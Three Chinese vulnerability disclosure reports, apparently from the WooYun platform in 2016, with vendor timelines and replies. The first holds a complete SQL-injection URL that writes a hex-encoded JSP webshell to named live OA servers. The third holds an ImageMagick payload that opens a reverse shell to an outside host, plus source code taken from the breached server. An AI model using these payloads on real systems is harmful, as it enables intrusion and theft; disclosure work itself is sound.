漏洞详情披露状态： 2016-05-10： 细节已通知厂商并且等待厂商处理中2016-05-11： 厂商已经确认，细节仅向厂商公开2016-05-21： 细节向核心白帽子及相关领域专家公开2016-05-31： 细节向普通白帽子公开2016-06-10： 细节向实习白帽子公开2016-06-25： 细节向公众公开简要描述：又学到了一点新姿势，问题是只修复了提权，注入漏洞并没有修复。详细说明：http://a6.gykghn.com:8080/yyoa/index.jsp 湖南分公司http://oa.sinopharm-fj.com:8080/yyoa 福建分公司http://oa.gykgnmg.com/yyoa 内蒙古分公司以湖南分公司为例先读取数据库目录然后尝试拼接写网站目录可以读取，然后直接上传文件写入shellhttp://a6.gykghn.com:8080/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20unhex%28%273C25696628726571756573742E676574506172616D657465722822662229213D6E756C6C29286E6577206A6176612E696F2E46696C654F757470757453747265616D286170706C69636174696F6E2E6765745265616C5061746828225C22292B726571756573742E676574506172616D65746572282266222929292E777269746528726571756573742E676574506172616D6574657228227422292E67657442797465732829293B253E%27%29%20%20into%20outfile%20%27D:/UFseeyon/OA/tomcat/webapps/yyoa/sky123.jsp%27再通过本地构造上传成功上传大马是管理员权限 漏洞证明：    修复方案：继续修复吧版权声明：转载请注明来源 sky666@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：20确认时间：2016-05-11 08:43厂商回复：我们会尽快修复最新状态：暂无

漏洞详情披露状态： 2016-05-04： 细节已通知厂商并且等待厂商处理中2016-05-05： 厂商已经确认，细节仅向厂商公开2016-05-15： 细节向核心白帽子及相关领域专家公开2016-05-25： 细节向普通白帽子公开2016-06-04： 细节向实习白帽子公开2016-06-19： 细节向公众公开简要描述：RT详细说明：http://webmail.jsbchina.cn/webmail/login/login.domask 区域*****g/000***** *****8888***** *****8888***** *****ng/8***** *****8888***** *****8888***** *****g/8***** 漏洞证明：由于登陆要修改密码就不登陆演示了 修复方案：求高Rank 求大厂 各位审核大大版权声明：转载请注明来源 隔壁小王@乌云漏洞回应厂商回应：危害等级：低漏洞Rank：4确认时间：2016-05-05 17:34厂商回复：感谢关注，已处理。最新状态：暂无

漏洞详情披露状态： 2016-05-08： 细节已通知厂商并且等待厂商处理中2016-05-08： 厂商已经确认，细节仅向厂商公开2016-05-18： 细节向核心白帽子及相关领域专家公开2016-05-28： 细节向普通白帽子公开2016-06-07： 细节向实习白帽子公开2016-06-22： 细节向公众公开简要描述：新浪乐居某服务器的两处命令执行，可影响乐居多个重要站点，包括主站详细说明：存在漏洞的连接为：http://supports.house.sina.com.cn/bbs/img.php?w=140&h=105&m=1&url=http://img2.3lian.com/img2007/19/33/005.jpg这是一个把远程图片剪切大小的连接，存在ImageMagick 命令执行漏洞把远程的url地址换成自己服务器的图片，访问：http://supports.house.sina.com.cn/bbs/img.php?w=140&h=105&m=1&url=http://101.200.**.**/out.jpg&dpc=1 修改out.jpgcode 区域push graphic-context viewbox 0 0 640 480 fill 'url(https://"|bash -i >& /dev/tcp/101.200.**.**/8081 0>&1;")' pop graphic-contextop graphic-context然后再访问http://supports.house.sina.com.cn/bbs/img.php?w=140&h=105&m=1&url=http://101.200.**.**/out.jpg&dpc=1 反弹一个shell回来了漏洞证明：这个服务器简单看了下，是乐居一个重要的服务器，放了乐居的各种网站都在上面这些网站的源代码全部可读，其中乐居主站目录为：/data1/vhosts/www.leju.com/htdocsview-source:index.phpcode 区域header("Cache-Control: no-cache, must-revalidate"); // HTTP/1.1 header("Expires: Sat, 26 Jul 1997 05:00:00 GMT"); // Date in the past require_once $_SERVER['DOCUMENT_ROOT'].'/framework/include/function.php'; $limittime = 1451376000;//29号下午4点上线 if(time() > $limittime) { require_once $_SERVER['DOCUMENT_ROOT'].'/framework/include/expand.fun.php'; } //域名跳转 if ( $_SERVER['HTTP_HOST'] == 'eju.com' || $_SERVER['HTTP_HOST'] == 'esalse.leju.com' ) { header("Location:http://www.eju.com/{$_SERVER['REQUEST_URI']}"); die; } $source_arr = array(); $sourcestr = ''; isset($_GET['source']) ? array_push($source_arr, 'source='.$_GET['source']) : ''; isset($_GET['source_ext']) ? array_push($source_arr, 'source_ext='.$_GET['source_ext']) : ''; if(!empty($source_arr)) { $sourcestr = implode('&', $source_arr); } //跳转到leju.com的域名 if ( $_SERVER['HTTP_HOST'] == 'leju.cn' || $_SERVER['HTTP_HOST'] == 'www.leju.cn' || $_SERVER['HTTP_HOST'] == 'ileju.cn' ||$_SERVER['HTTP_HOST'] == 'www.ileju.cn' ||$_SERVER['HTTP_HOST'] == 'www.ileju.com' ||$_SERVER['HTTP_HOST'] == 'ileju.com') { if(!empty($sourcestr)) { header("Location:http://www.leju.com?".$sourcestr); } else { header("Location:http://www.leju.com"); } die; } //参数转义处理 $_POST = daddslashes($_POST); $_GET = daddslashes($_GET); $_COOKIE = daddslashes($_COOKIE); $_REQUEST = daddslashes($_REQUEST); //解决XSS漏洞 $_p = array(); $_g = array(); $_c = array(); $array = array('<','>'); $array_c = array("user()", "sleep(", "length(", "insert", "select",'<','>',"'","(",")"); $pgc = array("\\",'<','>','</');另外的一处命令执行为http://supports.jiaju.sina.com.cn/api/img_publish.php?dpc=1&w=96&h=96&m=0&s=http://101.200.**.**/out.jpg 类似的就不重复提交了。修复方案：1 修复ImageMagick漏洞2 那两个连接还存在SSRF一起修复下吧。版权声明：转载请注明来源 李长歌@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：20确认时间：2016-05-08 20:34厂商回复：非常感谢您对乐居的关注，我们已经对该项目进行处理，请测试最新状态：暂无